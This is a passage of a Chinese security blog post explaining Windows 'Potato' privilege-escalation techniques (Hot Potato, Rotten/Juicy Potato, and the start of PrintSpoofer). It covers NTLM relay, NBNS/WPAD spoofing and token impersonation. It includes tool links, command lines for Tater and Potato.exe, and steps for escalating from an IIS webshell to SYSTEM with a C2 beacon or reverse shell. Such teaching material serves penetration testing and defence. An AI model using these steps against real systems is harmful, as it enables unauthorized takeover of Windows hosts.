<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>Potato 家族提权分析 - Geekby&#39;s Blog</title><meta name="Description" content="Potato 家族提权分析"><meta property="og:title" content="Potato 家族提权分析" />
<meta property="og:description" content="Potato 家族提权分析" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2020/08/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-08-15T09:05:00+08:00" />
<meta property="article:modified_time" content="2020-08-15T09:05:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Potato 家族提权分析"/>
<meta name="twitter:description" content="Potato 家族提权分析"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2020/08/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90/" /><link rel="prev" href="https://www.geekby.site/2020/07/apache-dubbo-provider%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9Ecve-2020-1948/" /><link rel="next" href="https://www.geekby.site/2020/08/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E7%A9%BF%E9%80%8F/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "Potato 家族提权分析",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2020\/08\/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "渗透测试, 提权","wordcount":  861 ,
        "url": "https:\/\/www.geekby.site\/2020\/08\/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90\/","datePublished": "2020-08-15T09:05:00+08:00","dateModified": "2020-08-15T09:05:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "Potato 家族提权分析"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">Potato 家族提权分析</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="far fa-folder fa-fw"></i>渗透测试</a>&nbsp;<a href="/categories/%E6%8F%90%E6%9D%83/"><i class="far fa-folder fa-fw"></i>提权</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2020-08-15">2020-08-15</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 861 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 5 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-前言">1 前言</a>
      <ul>
        <li><a href="#11-windows-服务的登录用户">1.1 windows 服务的登录用户</a></li>
        <li><a href="#12-前提">1.2 前提</a></li>
        <li><a href="#13-windows-token">1.3 Windows Token</a></li>
      </ul>
    </li>
    <li><a href="#2-hot-potato">2 Hot Potato</a>
      <ul>
        <li><a href="#21-简介">2.1 简介</a></li>
        <li><a href="#22-nbns">2.2 NBNS</a>
          <ul>
            <li><a href="#221-概念">2.2.1 概念</a></li>
            <li><a href="#222-nbns-欺骗">2.2.2 NBNS 欺骗</a></li>
          </ul>
        </li>
        <li><a href="#23-wpad-代理">2.3 WPAD 代理</a></li>
        <li><a href="#24-http---smb-ntlm-relay">2.4 HTTP -&gt; SMB NTLM Relay</a></li>
        <li><a href="#25-攻击流程">2.5 攻击流程</a></li>
      </ul>
    </li>
    <li><a href="#3-rotten-potato--juicypotato">3 Rotten Potato &amp; JuicyPotato</a>
      <ul>
        <li><a href="#31-原理">3.1 原理</a></li>
        <li><a href="#32-实现流程">3.2 实现流程</a></li>
        <li><a href="#32-实战">3.2 实战</a>
          <ul>
            <li><a href="#321-initial-access">3.2.1 initial access</a></li>
            <li><a href="#322-根据操作系统选择可用的-clsid">3.2.2 根据操作系统选择可用的 CLSID</a></li>
            <li><a href="#323-提权">3.2.3 提权</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#4-printspoofer-pipepotato-or-badpotato">4 PrintSpoofer (PipePotato or BadPotato)</a>
      <ul>
        <li><a href="#41-原理">4.1 原理</a></li>
        <li><a href="#42-实战">4.2 实战</a>
          <ul>
            <li><a href="#421-派生一个-system-交互式-shell">4.2.1 派生一个 SYSTEM 交互式 shell</a></li>
            <li><a href="#422-派生一个-system-的进程">4.2.2 派生一个 SYSTEM 的进程</a></li>
            <li><a href="#423-桌面环境下派生-system-进程">4.2.3 桌面环境下派生 SYSTEM 进程</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#5-roguepotato">5 RoguePotato</a>
      <ul>
        <li><a href="#51-原理">5.1 原理</a></li>
        <li><a href="#52-实战">5.2 实战</a></li>
      </ul>
    </li>
    <li><a href="#6-sweetpotato">6 SweetPotato</a>
      <ul>
        <li><a href="#61-原理">6.1 原理</a></li>
        <li><a href="#62-实战">6.2 实战</a></li>
      </ul>
    </li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="potato-家族提权分析">Potato 家族提权分析</h1>
<h2 id="1-前言">1 前言</h2>
<h3 id="11-windows-服务的登录用户">1.1 windows 服务的登录用户</h3>
<ul>
<li>Local System - NT AUTHORITY\SYSTEM</li>
<li>Network Service - NT AUTHORITY\Network Service</li>
<li>Local Service - NT AUTHORITY\Local Service</li>
</ul>
<p>服务账户在 windows 权限模型中本身就拥有很高的权限，在实际渗透过程中，拿到 webshell 下，用户权限是 IIS 或者 apache，或通过 SQLi 执行 xp_cmdshell，此时手里的服务账户在进行操作时是低权限账户，而使用该提权手法可以直接获取 SYSTEM 权限。</p>
<h3 id="12-前提">1.2 前提</h3>
<p>利用 Potato 提权（除开 Hot Potato）的是前提是拥有 <strong>SeImpersonatePrivilege</strong> 或 <strong>SeAssignPrimaryTokenPrivilege</strong> 权限，以下用户拥有 <strong>SeImpersonatePrivilege</strong> 权限（而只有更高权限的账户比如 SYSTEM 才有 SeAssignPrimaryTokenPrivilege 权限）：</p>
<ul>
<li>本地管理员账户(不包括管理员组普通账户)和本地服务账户</li>
<li>由 SCM 启动的服务</li>
</ul>
<p>PS：本机测试时即使在本地策略中授予管理员组普通用户 SeImpersonatePrivilege 特权，在 cmd.exe 中 whoami /priv 也不显示该特权，且无法利用；而 SeAssignPrimaryTokenPrivilege 特权则可以正常授予普通用户</p>
<h3 id="13-windows-token">1.3 Windows Token</h3>
<p>windows token 是描述安全上下文的对象，用户登陆后系统就会生成 token，创建新进程或新线程时这个 token 会不断拷贝。</p>
<p>当用户具有 <strong>SeImpersonatePrivilege</strong> 特权，则可以调用 <strong>CreateProcessWithTokenW</strong> 以某个 Token 的权限启动新进程</p>
<p>当用户具有 <strong>SeAssignPrimaryTokenPrivilege</strong> 特权，则可以调用 <strong>CreateProcessAsUserW</strong> 以 Token 权限启动新进程</p>
<p>具体可以参考「Windows Access Token 攻击」文章。</p>
<h2 id="2-hot-potato">2 Hot Potato</h2>
<h3 id="21-简介">2.1 简介</h3>
<p>2016 年 1 月， Dominic White 发表了一篇文章，发布了一种基于 NTLM 反射的权限提升攻击方式，命名为 Hot Potato。可以从主机的最低用户权限提升至系统最高的 <code>NT\AUTHORITY SYSTEM</code> 权限。</p>
<p>Hot Potato 利用著名的 NTLM Relay 攻击(HTTP -&gt; SMB)和 NBNS 欺骗攻击，获取 Windows  系统的最高权限 SYSTEM。可以从主机的最低用户权限提升至系统最高的 NT\AUTHORITY SYSTEM 权限。</p>
<h3 id="22-nbns">2.2 NBNS</h3>
<h4 id="221-概念">2.2.1 概念</h4>
<p>NBNS (Net BIOS Name Service)是 Windows 系统中广泛被使用的 UDP 广播服务，即命名查询服务。该服务使用 UDP 协议实现，可以通过发送局域网内广播来实现本地名称解析。</p>
<p>类似于 TCP/IP 协议中的 DNS，它负责查找目标机器相应的 IP 地址，并赋予一个  NetBIOS 名称。微软 WINS 服务就是采用 NBNS协议。</p>
<h4 id="222-nbns-欺骗">2.2.2 NBNS 欺骗</h4>
<p>系统进行一个名字查询的逻辑如下：</p>
<ol>
<li>首先查询本地的 hosts 文件</li>
<li>DNS Lookup 查询(本地 DNS cache，再向 DNS 服务器请求)</li>
<li>NBNS 查询</li>
</ol>
<p>NBNS 的逻辑是向本地所有主机广播一条消息，谁是 xxx，如果谁响应了该广播消息，谁就是 xxx</p>
<p>在内网渗透测试时，攻击者往往会监听 NBNS 广播消息，并且会应答自己是 xxx，这就是NBNS 欺骗；ARP欺骗是 MAC 层的欺骗方式</p>
<p>NBNS 包有 1 个 2 字节的 TXID 字段，必须进行请求\响应的匹配。因为是提权漏洞，所以攻击之前没有权限可以监听流量。可以通过 1-65535 之间进行泛洪猜测。</p>
<p>如果网络中有 DNS 记录，此时就不会用到 NBNS 协议；可以通过 UDP 端口耗尽的攻击技术，让所有 DNS 查询失败，从而必须使用 NBNS 协议</p>
<h3 id="23-wpad-代理">2.3 WPAD 代理</h3>
<p>Windows 系统里，IE 浏览器会自动检测 IE 代理配置信息，方式是访问，<code>http://wpad/wpad.dat&amp;#8221</code></p>
<p>WPAD 是不一定存在于网络中，因为即使有 DNS 服务器，也没有必要解析 WPAD，除非网络想通过配置脚本自动配置网络中的代理信息，这种情况很方便。</p>
<p>因此在 hosts、DNS 查询都不能获取 WPAD 的情况下，系统必然使用 NBNS 进行名字查询，此时可以通过 NBNS 欺骗，告知自己就是 WPAD 可以构造 HTTP 服务器，响应 HTTP  <code>http://wpad/wpad.dat&amp;#8221</code> 查询</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150545.png-water_print" /></p>
<p>通过在 127.0.0.1 上构建 HTTP，将查询 WPAD 的流量全部引导至本地 127.0.0.1；即使低权限用户发出的对 WPAD 的 NBNS 欺骗，高权限进程也会受影响，认为 WPAD 就是欺骗后的结果。包括本地管理员进程和 SYSTEM 进程。</p>
<h3 id="24-http---smb-ntlm-relay">2.4 HTTP -&gt; SMB NTLM Relay</h3>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815150941.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815151054.png-water_print" /></p>
<p>NTLM 认证对于中间人攻击的防御能力不强，此前针对 NTLM 的重放攻击聚焦于 SMB -&gt; SMB 协议，反射攻击访问者的主机，获取远程执行权限;</p>
<p>微软通过补丁封堵了 SMB -&gt; SMB 协议的重放反射攻击，但是 HTTP -&gt; SMB 这种跨协议的攻击仍然有效</p>
<h3 id="25-攻击流程">2.5 攻击流程</h3>
<p>Hot Potato 攻击就是结合了这几点，实现权限提升：</p>
<ol>
<li>NBNS 欺骗</li>
<li>构造本地 HTTP，响应 WPAD</li>
<li>HTTP -&gt; SMB NTLM Relay</li>
<li>等待高权限进程的访问，即激活更新服务(低权限可激活)</li>
</ol>
<p><a href="https://github.com/Kevin-Robertson/Tater" target="_blank" rel="noopener noreffer">https://github.com/Kevin-Robertson/Tater</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">Import-Module</span> <span class="p">.\</span><span class="n">Tater</span><span class="p">.</span><span class="n">ps1</span>
</span></span><span class="line"><span class="cl"><span class="nb">Invoke-Tater</span> <span class="n">-Command</span> <span class="s2">&#34;command to execute&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161221.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200815161322.png-water_print" /></p>
<p>工具地址：<a href="https://github.com/foxglovesec/Potato" target="_blank" rel="noopener noreffer">https://github.com/foxglovesec/Potato</a></p>
<ul>
<li>Win7 利用 - Windows Defender 更新机制</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Potato.exe -ip -cmd <span class="o">[</span>cmd to run<span class="o">]</span> -disable_exhaust <span class="nb">true</span>
</span></span></code></pre></td></tr></table>
</div>
</div><ul>
<li>Win Server 2008 利用 - Windows Update 机制</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Potato.exe -ip -cmd <span class="o">[</span>cmd to run<span class="o">]</span> -disable_exhaust <span class="nb">true</span> -disable_defender <span class="nb">true</span> -spoof_host WPAD.EMC.LOCAL
</span></span></code></pre></td></tr></table>
</div>
</div><ul>
<li>Win Server 2012 R2 - 自动更新机制，该机会每天下载证书信任列表(CTL)</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true
</span></span></code></pre></td></tr></table>
</div>
</div><p>防护：</p>
<ul>
<li>SMB 签名</li>
</ul>
<h2 id="3-rotten-potato--juicypotato">3 Rotten Potato &amp; JuicyPotato</h2>
<h3 id="31-原理">3.1 原理</h3>
<p>这两种不同于初始的 Potato，它是通过 DCOM CALL 来使服务向攻击者监听的端口发起连接并进行 NTLM 认证</p>
<p>Rotten Potato 和 Juicy Potato 几乎是同样的原理，后者在前者的基础上完善。</p>
<p>需要理解的几个知识：</p>
<ol>
<li>使用 DCOM 时，如果以服务的方式远程连接，那么权限为 System，例如 BITS 服务</li>
<li>使用 DCOM 可以通过 TCP 连接到本机的一个端口，发起 NTLM 认证，该认证可以被重放</li>
<li>LocalService 用户默认具有 SeImpersonate 和 SeAssignPrimaryToken 权限</li>
<li>开启 SeImpersonate 权限后，能够在调用 CreateProcessWithToken 时，传入新的 Token 创建新的进程</li>
<li>开启 SeAssignPrimaryToken 权限后，能够在调用 CreateProcessAsUser 时，传入新的 Token 创建新的进程</li>
</ol>
<h3 id="32-实现流程">3.2 实现流程</h3>
<ul>
<li>加载 COM，发出请求，权限为 System</li>
</ul>
<p>在指定 ip 和端口的位置尝试加载一个 COM 对象</p>
<p>RottenPotatoNG 使用的 COM 对象为 BITS，CLSID 为 <code>{4991d34b-80a1-4291-83b6-3328366b9097}</code></p>
<p>可供选择的 COM 对象不唯一，Juicy Potato 提供了多个，详细列表可参考如下地址：</p>
<p><a href="https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md" target="_blank" rel="noopener noreffer">https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md</a></p>
<ul>
<li>回应步骤 1 的请求，发起 NTLM 认证</li>
</ul>
<p>正常情况下，由于权限不足，当前权限不是 System，无法认证成功</p>
<ul>
<li>针对本地端口，同样发起 NTLM 认证，权限为当前用户</li>
</ul>
<p>由于权限为当前用户，所以 NTLM 认证能够成功完成</p>
<div class="details admonition info open">
        <div class="details-summary admonition-title">
            <i class="icon fas fa-info-circle fa-fw"></i>信息<i class="details-icon fas fa-angle-right fa-fw"></i>
        </div>
        <div class="details-content">
            <div class="admonition-content"><p>RottenPotatoNG 使用的 135 端口</p>
<p>Juicy Potato 支持指定任意本地端口，但是 RPC 一般默认为135端口，很少被修改</p>
</div>
        </div>
    </div>
<ul>
<li>分别拦截两个 NTLM 认证的数据包，替换数据，通过 NTLM 重放使得步骤 1(权限为 System)的 NTLM 认证通过，获得 System 权限的 Token</li>
</ul>
<p>重放时需要注意 NTLM 认证的 NTLM Server Challenge 不同，需要修正</p>
<ul>
<li>利用 System 权限的 Token 创建新进程</li>
</ul>
<p>如果开启 SeImpersonate 权限，调用 CreateProcessWithToken，传入 System 权限的 Token，创建的进程为 System 权限</p>
<p>或者</p>
<p>如果开启 SeAssignPrimaryToken 权限，调用 CreateProcessAsUser，传入 System 权限的 Token，创建的进程为 System 权限</p>
<h3 id="32-实战">3.2 实战</h3>
<p>工具地址：<a href="https://github.com/ohpe/juicy-potato" target="_blank" rel="noopener noreffer">https://github.com/ohpe/juicy-potato</a></p>
<h4 id="321-initial-access">3.2.1 initial access</h4>
<p>一个 <code>iis apppool\defaultapppool</code> 权限的 webshell。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160500.png-water_print" /></p>
<h4 id="322-根据操作系统选择可用的-clsid">3.2.2 根据操作系统选择可用的 CLSID</h4>
<p>参考列表</p>
<p><a href="https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md" target="_blank" rel="noopener noreffer">https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md</a></p>
<p>例如测试系统 Server2012，选择 CLSID 为<code>{8BC3F05E-D86B-11D0-A075-00C04FB68820}</code></p>
<p>使用批处理调用 juicypotato.exe 逐个验证：</p>
<p>地址如下：</p>
<p><a href="https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat" target="_blank" rel="noopener noreffer">https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat</a></p>
<p>bat 脚本不需要做修改</p>
<h4 id="323-提权">3.2.3 提权</h4>
<p>上传 CS 的马，或者反弹一个交互式的 shell 回来：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160423.png-water_print" /></p>
<p>利用 JuicePotato 执行命令或 C2 程序</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131160439.png-water_print" /></p>
<h2 id="4-printspoofer-pipepotato-or-badpotato">4 PrintSpoofer (PipePotato or BadPotato)</h2>
<h3 id="41-原理">4.1 原理</h3>
<p>通过 Windows named pipe 的一个 API: <code>ImpersonateNamedPipeClient</code>来模拟高权限客户端的 token（还有类似的<code>ImpersonatedLoggedOnUser</code>，<code>RpcImpersonateClient</code>函数），调用该函数后会更改当前线程的安全上下文，它利用了打印机组件路径检查的 BUG，使 SYSTEM 权限服务能连接到攻击者创建的 named pipe。</p>
<p><code>spoolsv.exe</code> 服务有一个公开的 RPC 服务，里面有以下函数：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="n">DWORD</span> <span class="n">RpcRemoteFindFirstPrinterChangeNotificationEx</span><span class="p">(</span> 
</span></span><span class="line"><span class="cl">    <span class="cm">/* [in] */</span> <span class="n">PRINTER_HANDLE</span> <span class="n">hPrinter</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* [in] */</span> <span class="n">DWORD</span> <span class="n">fdwFlags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* [in] */</span> <span class="n">DWORD</span> <span class="n">fdwOptions</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* [unique][string][in] */</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="n">pszLocalMachine</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* [in] */</span> <span class="n">DWORD</span> <span class="n">dwPrinterLocal</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* [unique][in] */</span> <span class="n">RPC_V2_NOTIFY_OPTIONS</span> <span class="o">*</span><span class="n">pOptions</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>pszLocalMachine </code>参数需要传递 UNC 路径，传递 <code>\\127.0.0.1</code> 时，服务器会访问 <code>\\127.0.0.1\pipe\spoolss</code>，但这个管道已经被系统注册了，如果我们传递 <code>\\127.0.0.1\pipe</code> 则因为路径检查而报错</p>
